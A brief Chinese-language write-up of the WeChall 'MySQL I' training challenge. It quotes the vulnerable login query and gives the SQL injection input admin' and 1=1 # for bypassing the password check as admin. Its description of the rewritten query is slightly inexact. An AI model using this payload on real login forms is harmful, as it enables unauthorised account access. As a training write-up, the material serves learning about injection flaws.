Training: MySQL I (MySQL, Exploit, Training)
题目链接:http://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php?highlight=christmas
的确是非常简单的SQL注入
经过阅读源代码可知判断通过的方式是:
"SELECT * FROM users WHERE username='$username' AND password='$password'";
而且有admin这个用户的特判,利用php的局部注释“#”可以进行攻击:
username输入:admin' and 1=1 #
这里的代码将被翻译成:
username='admin' # and password='$password'"
所以密码的验证将被忽略,可以作为admin登录